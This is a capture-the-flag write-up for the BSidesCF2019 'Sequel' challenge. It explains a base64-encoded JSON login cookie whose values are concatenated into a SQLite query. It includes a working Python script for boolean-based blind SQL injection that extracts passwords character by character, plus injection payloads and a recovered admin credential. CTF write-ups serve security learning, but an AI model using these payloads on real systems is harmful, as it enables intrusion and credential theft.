# [BSidesCF2019]Sequel
Brute-forcing the login form gets in with the password guest.
The page then gives the hint: Maybe the admin likes it too?
There is a session cookie, so a JWT attack looked worth trying, but the cookie is nothing more than plain base64.
Base64-decode it and you get the JSON credentials.
Then, for reasons I never fully worked out, the solution jumps to SQLite injection: the values from the decoded JSON are concatenated straight into a SQL query, and the backend turns out to be SQLite.
Following the writeup:
```python
import requests
import base64
import string
import time

url = "http://0eaa6072-56ef-4b36-9ba7-a0e1d673c493.node4.buuoj.cn:81/sequels"

# Boolean-based blind injection through the base64-encoded JSON cookie.
# In the JSON, \" is an escaped quote, so the decoded username contains a
# literal " that closes the double-quoted SQL string the server builds by
# concatenation; the trailing  or \"  re-opens a literal so the rest of the
# server's query still parses.  A true condition makes the page return the
# movie list, so "Movie" in the body is the oracle.
for x in range(0, 10):          # LIMIT offset,1 -- offset 0 is the first row
    password = ''
    print('row', x)
    for n in range(1, 40):      # position inside the password (md5 hex is 32 chars)
        matched = False
        for i in string.printable:
            if i in '"\\':
                continue        # would break the JSON / SQL literal; false negative anyway
            time.sleep(0.1)
            u = r'\" or (substr((select password from userinfo limit {},1),{},1)=\"{}\") or \"'.format(x, n, i)
            payload = '{"username":"%s","password":"guest"}' % u
            cookies = {"1337_AUTH": base64.b64encode(payload.encode('utf-8')).decode('utf-8')}
            res = requests.get(url, cookies=cookies)
            if "Movie" in res.text:
                password += i
                print(password)
                matched = True
                break
        if not matched:
            # substr() past the end of the value matches nothing: this row is done
            break
    print('row', x, 'password:', password)
```
# SQLite injection notes
sqlite_master plays the role that information_schema plays in MySQL: it lists every table, index and view together with the CREATE statement that defines it.
```sql
CREATE TABLE sqlite_master (
  type TEXT,
  name TEXT,
  tbl_name TEXT,
  rootpage INTEGER,
  sql TEXT
);
```
When writing the exploit, remember the order of parsing: the cookie must first decode to valid JSON in the original format, and only then are the values concatenated as strings into the SQL statement. The double quote that breaks out of the SQL literal therefore has to be written as \" inside the JSON, otherwise the JSON itself is invalid and the payload never reaches the query:
```json
{"username":"\" or 1=1 or \"","password":"guest"}
```
Username: sequeladmin
Password: f5ec3af19f0d3679e7d5a148f4ac323d
Log in with the recovered password and that is it.
Reference: https://syunaht.com/p/3809605982.html